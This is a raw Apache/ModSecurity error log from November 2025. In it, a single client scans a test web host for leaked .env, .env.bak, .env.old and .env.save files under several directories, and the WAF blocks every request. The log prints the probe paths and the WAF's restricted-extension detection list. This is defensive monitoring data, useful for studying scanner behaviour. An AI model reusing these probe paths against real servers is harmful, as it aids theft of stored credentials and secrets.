[Tue Nov 18 14:51:52.378977 2025] [:error] [pid 154301] [client 34.235.129.146:32924] [client 34.235.129.146] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /assets/.env.save"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/assets/.env.save"] [unique_id "aRx5-O18X441rUDF_U5eSQAAAAg"]
[Tue Nov 18 14:51:52.379222 2025] [:error] [pid 154301] [client 34.235.129.146:32924] [client 34.235.129.146] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/assets/.env.save"] [unique_id "aRx5-O18X441rUDF_U5eSQAAAAg"]
[Tue Nov 18 14:51:52.379424 2025] [:error] [pid 154301] [client 34.235.129.146:32924] [client 34.235.129.146] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/assets/.env.save"] [unique_id "aRx5-O18X441rUDF_U5eSQAAAAg"]
[Tue Nov 18 14:51:52.382606 2025] [:error] [pid 160906] [client 34.235.129.146:32932] [client 34.235.129.146] ModSecurity: Warning. String match within ".asa/ .asax/ .ascx/ .axd/ .backup/ .bak/ .bat/ .cdx/ .cer/ .cfg/ .cmd/ .com/ .config/ .conf/ .cs/ .csproj/ .csr/ .dat/ .db/ .dbf/ .dll/ .dos/ .htr/ .htw/ .ida/ .idc/ .idq/ .inc/ .ini/ .key/ .licx/ .lnk/ .log/ .mdb/ .old/ .pass/ .pdb/ .pol/ .printer/ .pwd/ .rdb/ .resources/ .resx/ .sql/ .swp/ .sys/ .vb/ .vbs/ .vbproj/ .vsdisco/ .webinfo/ .xsd/ .xsx/" at TX:extension. [file "/usr/share/modsecurity-crs/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf"] [line "997"] [id "920440"] [msg "URL file extension is restricted by policy"] [data ".bak"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-protocol"] [tag "OWASP_CRS"] [tag "OWASP_CRS/POLICY/EXT_RESTRICTED"] [tag "WASCTC/WASC-15"] [tag "OWASP_TOP_10/A7"] [tag "PCI/6.5.10"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/public/.env.bak"] [unique_id "aRx5-P7FUeIdxVPAs5igvAAAAAY"]
[Tue Nov 18 14:51:52.382790 2025] [:error] [pid 160906] [client 34.235.129.146:32932] [client 34.235.129.146] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /public/.env.bak"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/public/.env.bak"] [unique_id "aRx5-P7FUeIdxVPAs5igvAAAAAY"]
[Tue Nov 18 14:51:52.382998 2025] [:error] [pid 160906] [client 34.235.129.146:32932] [client 34.235.129.146] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 10)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/public/.env.bak"] [unique_id "aRx5-P7FUeIdxVPAs5igvAAAAAY"]
[Tue Nov 18 14:51:52.383186 2025] [:error] [pid 160906] [client 34.235.129.146:32932] [client 34.235.129.146] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 10 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 10, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/public/.env.bak"] [unique_id "aRx5-P7FUeIdxVPAs5igvAAAAAY"]
[Tue Nov 18 14:51:54.037667 2025] [:error] [pid 160237] [client 34.235.129.146:32966] [client 34.235.129.146] ModSecurity: Warning. String match within ".asa/ .asax/ .ascx/ .axd/ .backup/ .bak/ .bat/ .cdx/ .cer/ .cfg/ .cmd/ .com/ .config/ .conf/ .cs/ .csproj/ .csr/ .dat/ .db/ .dbf/ .dll/ .dos/ .htr/ .htw/ .ida/ .idc/ .idq/ .inc/ .ini/ .key/ .licx/ .lnk/ .log/ .mdb/ .old/ .pass/ .pdb/ .pol/ .printer/ .pwd/ .rdb/ .resources/ .resx/ .sql/ .swp/ .sys/ .vb/ .vbs/ .vbproj/ .vsdisco/ .webinfo/ .xsd/ .xsx/" at TX:extension. [file "/usr/share/modsecurity-crs/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf"] [line "997"] [id "920440"] [msg "URL file extension is restricted by policy"] [data ".bak"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-protocol"] [tag "OWASP_CRS"] [tag "OWASP_CRS/POLICY/EXT_RESTRICTED"] [tag "WASCTC/WASC-15"] [tag "OWASP_TOP_10/A7"] [tag "PCI/6.5.10"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/includes/.env.bak"] [unique_id "aRx5-k0XkfZCrdQo7dFhWwAAAAM"]
[Tue Nov 18 14:51:54.037829 2025] [:error] [pid 160237] [client 34.235.129.146:32966] [client 34.235.129.146] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /includes/.env.bak"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/includes/.env.bak"] [unique_id "aRx5-k0XkfZCrdQo7dFhWwAAAAM"]
[Tue Nov 18 14:51:54.038029 2025] [:error] [pid 160237] [client 34.235.129.146:32966] [client 34.235.129.146] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 10)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/includes/.env.bak"] [unique_id "aRx5-k0XkfZCrdQo7dFhWwAAAAM"]
[Tue Nov 18 14:51:54.038180 2025] [:error] [pid 160237] [client 34.235.129.146:32966] [client 34.235.129.146] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 10 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 10, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/includes/.env.bak"] [unique_id "aRx5-k0XkfZCrdQo7dFhWwAAAAM"]
[Tue Nov 18 14:51:54.039863 2025] [:error] [pid 160901] [client 34.235.129.146:32950] [client 34.235.129.146] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /includes/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/includes/.env"] [unique_id "aRx5-h54imVYfbO8_klVVgAAAAU"]
[Tue Nov 18 14:51:54.040064 2025] [:error] [pid 160901] [client 34.235.129.146:32950] [client 34.235.129.146] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/includes/.env"] [unique_id "aRx5-h54imVYfbO8_klVVgAAAAU"]
[Tue Nov 18 14:51:54.040221 2025] [:error] [pid 160901] [client 34.235.129.146:32950] [client 34.235.129.146] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/includes/.env"] [unique_id "aRx5-h54imVYfbO8_klVVgAAAAU"]
[Tue Nov 18 14:51:54.048662 2025] [:error] [pid 163656] [client 34.235.129.146:32934] [client 34.235.129.146] ModSecurity: Warning. String match within ".asa/ .asax/ .ascx/ .axd/ .backup/ .bak/ .bat/ .cdx/ .cer/ .cfg/ .cmd/ .com/ .config/ .conf/ .cs/ .csproj/ .csr/ .dat/ .db/ .dbf/ .dll/ .dos/ .htr/ .htw/ .ida/ .idc/ .idq/ .inc/ .ini/ .key/ .licx/ .lnk/ .log/ .mdb/ .old/ .pass/ .pdb/ .pol/ .printer/ .pwd/ .rdb/ .resources/ .resx/ .sql/ .swp/ .sys/ .vb/ .vbs/ .vbproj/ .vsdisco/ .webinfo/ .xsd/ .xsx/" at TX:extension. [file "/usr/share/modsecurity-crs/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf"] [line "997"] [id "920440"] [msg "URL file extension is restricted by policy"] [data ".old"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-protocol"] [tag "OWASP_CRS"] [tag "OWASP_CRS/POLICY/EXT_RESTRICTED"] [tag "WASCTC/WASC-15"] [tag "OWASP_TOP_10/A7"] [tag "PCI/6.5.10"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/assets/.env.old"] [unique_id "aRx5-sCoCYNOyUBImXwJLgAAAAc"]
[Tue Nov 18 14:51:54.048803 2025] [:error] [pid 163656] [client 34.235.129.146:32934] [client 34.235.129.146] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /assets/.env.old"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/assets/.env.old"] [unique_id "aRx5-sCoCYNOyUBImXwJLgAAAAc"]
[Tue Nov 18 14:51:54.048956 2025] [:error] [pid 163656] [client 34.235.129.146:32934] [client 34.235.129.146] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 10)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/assets/.env.old"] [unique_id "aRx5-sCoCYNOyUBImXwJLgAAAAc"]
[Tue Nov 18 14:51:54.049097 2025] [:error] [pid 163656] [client 34.235.129.146:32934] [client 34.235.129.146] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 10 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 10, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/assets/.env.old"] [unique_id "aRx5-sCoCYNOyUBImXwJLgAAAAc"]
[Tue Nov 18 14:51:54.121444 2025] [authz_core:error] [pid 160239] [client 34.235.129.146:32990] AH01630: client denied by server configuration: /var/www/magento.test.indacotrentino.com/www/lib/.env
[Tue Nov 18 14:51:54.124107 2025] [:error] [pid 160881] [client 34.235.129.146:32984] [client 34.235.129.146] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /includes/.env.save"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/includes/.env.save"] [unique_id "aRx5-sKvHpCFfzvQgqZeywAAAAQ"]
[Tue Nov 18 14:51:54.124272 2025] [:error] [pid 160881] [client 34.235.129.146:32984] [client 34.235.129.146] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/includes/.env.save"] [unique_id "aRx5-sKvHpCFfzvQgqZeywAAAAQ"]
[Tue Nov 18 14:51:54.124412 2025] [:error] [pid 160881] [client 34.235.129.146:32984] [client 34.235.129.146] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/includes/.env.save"] [unique_id "aRx5-sKvHpCFfzvQgqZeywAAAAQ"]
[Tue Nov 18 14:51:54.135662 2025] [authz_core:error] [pid 153863] [client 34.235.129.146:33006] AH01630: client denied by server configuration: /var/www/magento.test.indacotrentino.com/www/lib/.env.bak
[Tue Nov 18 14:51:54.155108 2025] [authz_core:error] [pid 160877] [client 34.235.129.146:33036] AH01630: client denied by server configuration: /var/www/magento.test.indacotrentino.com/www/lib/.env.old
[Tue Nov 18 14:51:54.157072 2025] [:error] [pid 154301] [client 34.235.129.146:33042] [client 34.235.129.146] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /application/.env.save"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/application/.env.save"] [unique_id "aRx5-u18X441rUDF_U5eSgAAAAg"]
[Tue Nov 18 14:51:54.157296 2025] [:error] [pid 154301] [client 34.235.129.146:33042] [client 34.235.129.146] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/application/.env.save"] [unique_id "aRx5-u18X441rUDF_U5eSgAAAAg"]
[Tue Nov 18 14:51:54.157447 2025] [:error] [pid 154301] [client 34.235.129.146:33042] [client 34.235.129.146] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/application/.env.save"] [unique_id "aRx5-u18X441rUDF_U5eSgAAAAg"]
[Tue Nov 18 14:51:54.157738 2025] [authz_core:error] [pid 166202] [client 34.235.129.146:33008] AH01630: client denied by server configuration: /var/www/magento.test.indacotrentino.com/www/lib/.env.save
[Tue Nov 18 14:51:54.172333 2025] [:error] [pid 160906] [client 34.235.129.146:33022] [client 34.235.129.146] ModSecurity: Warning. String match within ".asa/ .asax/ .ascx/ .axd/ .backup/ .bak/ .bat/ .cdx/ .cer/ .cfg/ .cmd/ .com/ .config/ .conf/ .cs/ .csproj/ .csr/ .dat/ .db/ .dbf/ .dll/ .dos/ .htr/ .htw/ .ida/ .idc/ .idq/ .inc/ .ini/ .key/ .licx/ .lnk/ .log/ .mdb/ .old/ .pass/ .pdb/ .pol/ .printer/ .pwd/ .rdb/ .resources/ .resx/ .sql/ .swp/ .sys/ .vb/ .vbs/ .vbproj/ .vsdisco/ .webinfo/ .xsd/ .xsx/" at TX:extension. [file "/usr/share/modsecurity-crs/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf"] [line "997"] [id "920440"] [msg "URL file extension is restricted by policy"] [data ".old"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-protocol"] [tag "OWASP_CRS"] [tag "OWASP_CRS/POLICY/EXT_RESTRICTED"] [tag "WASCTC/WASC-15"] [tag "OWASP_TOP_10/A7"] [tag "PCI/6.5.10"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/includes/.env.old"] [unique_id "aRx5-v7FUeIdxVPAs5igvQAAAAY"]
[Tue Nov 18 14:51:54.172478 2025] [:error] [pid 160906] [client 34.235.129.146:33022] [client 34.235.129.146] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /includes/.env.old"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/includes/.env.old"] [unique_id "aRx5-v7FUeIdxVPAs5igvQAAAAY"]
[Tue Nov 18 14:51:54.172652 2025] [:error] [pid 160906] [client 34.235.129.146:33022] [client 34.235.129.146] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 10)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/includes/.env.old"] [unique_id "aRx5-v7FUeIdxVPAs5igvQAAAAY"]
[Tue Nov 18 14:51:54.172816 2025] [:error] [pid 160906] [client 34.235.129.146:33022] [client 34.235.129.146] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 10 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 10, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/includes/.env.old"] [unique_id "aRx5-v7FUeIdxVPAs5igvQAAAAY"]
[Tue Nov 18 14:51:54.341736 2025] [:error] [pid 160901] [client 34.235.129.146:32970] [client 34.235.129.146] ModSecurity: Warning. String match within ".asa/ .asax/ .ascx/ .axd/ .backup/ .bak/ .bat/ .cdx/ .cer/ .cfg/ .cmd/ .com/ .config/ .conf/ .cs/ .csproj/ .csr/ .dat/ .db/ .dbf/ .dll/ .dos/ .htr/ .htw/ .ida/ .idc/ .idq/ .inc/ .ini/ .key/ .licx/ .lnk/ .log/ .mdb/ .old/ .pass/ .pdb/ .pol/ .printer/ .pwd/ .rdb/ .resources/ .resx/ .sql/ .swp/ .sys/ .vb/ .vbs/ .vbproj/ .vsdisco/ .webinfo/ .xsd/ .xsx/" at TX:extension. [file "/usr/share/modsecurity-crs/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf"] [line "997"] [id "920440"] [msg "URL file extension is restricted by policy"] [data ".bak"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-protocol"] [tag "OWASP_CRS"] [tag "OWASP_CRS/POLICY/EXT_RESTRICTED"] [tag "WASCTC/WASC-15"] [tag "OWASP_TOP_10/A7"] [tag "PCI/6.5.10"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/assets/.env.bak"] [unique_id "aRx5-h54imVYfbO8_klVVwAAAAU"]
[Tue Nov 18 14:51:54.341907 2025] [:error] [pid 160901] [client 34.235.129.146:32970] [client 34.235.129.146] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /assets/.env.bak"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/assets/.env.bak"] [unique_id "aRx5-h54imVYfbO8_klVVwAAAAU"]
[Tue Nov 18 14:51:54.342134 2025] [:error] [pid 160901] [client 34.235.129.146:32970] [client 34.235.129.146] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 10)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/assets/.env.bak"] [unique_id "aRx5-h54imVYfbO8_klVVwAAAAU"]
[Tue Nov 18 14:51:54.342317 2025] [:error] [pid 160901] [client 34.235.129.146:32970] [client 34.235.129.146] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 10 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 10, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/assets/.env.bak"] [unique_id "aRx5-h54imVYfbO8_klVVwAAAAU"]
[Tue Nov 18 14:51:54.343639 2025] [:error] [pid 163656] [client 34.235.129.146:33074] [client 34.235.129.146] ModSecurity: Warning. String match within ".asa/ .asax/ .ascx/ .axd/ .backup/ .bak/ .bat/ .cdx/ .cer/ .cfg/ .cmd/ .com/ .config/ .conf/ .cs/ .csproj/ .csr/ .dat/ .db/ .dbf/ .dll/ .dos/ .htr/ .htw/ .ida/ .idc/ .idq/ .inc/ .ini/ .key/ .licx/ .lnk/ .log/ .mdb/ .old/ .pass/ .pdb/ .pol/ .printer/ .pwd/ .rdb/ .resources/ .resx/ .sql/ .swp/ .sys/ .vb/ .vbs/ .vbproj/ .vsdisco/ .webinfo/ .xsd/ .xsx/" at TX:extension. [file "/usr/share/modsecurity-crs/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf"] [line "997"] [id "920440"] [msg "URL file extension is restricted by policy"] [data ".bak"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-protocol"] [tag "OWASP_CRS"] [tag "OWASP_CRS/POLICY/EXT_RESTRICTED"] [tag "WASCTC/WASC-15"] [tag "OWASP_TOP_10/A7"] [tag "PCI/6.5.10"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/application/.env.bak"] [unique_id "aRx5-sCoCYNOyUBImXwJLwAAAAc"]
